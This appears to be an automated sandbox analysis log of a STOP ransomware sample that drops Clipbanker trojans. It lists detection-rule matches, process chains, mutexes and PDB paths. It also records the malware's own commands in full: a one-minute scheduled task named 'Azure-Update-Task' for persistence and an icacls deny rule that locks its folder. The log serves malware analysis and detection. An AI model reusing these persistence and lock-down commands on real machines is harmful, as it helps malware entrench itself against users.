Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ScreenshotOptIn.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml, type: DROPPED Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, score = , license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-08-19
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 004065D4 appears 31 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 0042F7C0 appears 56 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 00428520 appears 57 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 004547A0 appears 31 times
Source: U59WtZz2Sg.exe Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: build2[1].exe.5.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsipc.dll.muiB vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.463172633.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDismHost.exej% vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.410994710.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: System.OriginalFileName vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.409368444.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: System.OriginalFileName vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe Static PE information: Section: .data ZLIB complexity 0.9938334668803419
Source: U59WtZz2Sg.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@32/1330@8/5
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 1_2_00411900
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: U59WtZz2Sg.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: unknown Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 1_2_0040D240
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218B7C6 CreateToolhelp32Snapshot,Module32First, 0_2_0218B7C6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: F5(O 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: 9OE 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: #aN 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: #m2d 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: qQUQ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: "wcL 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: 8d._ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: b.&F 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: I@KH 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: \@]K 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: >t9+ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: 3s 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: Tq. 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: G(p 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: B;S_ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: mr`7 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: R@ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: R@ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: lasisis 0_2_00403607
Source: U59WtZz2Sg.exe String found in binary or memory: set-addPolicy
Source: U59WtZz2Sg.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: U59WtZz2Sg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\gahu\juviru.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdbGCTL source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdb source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0h source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
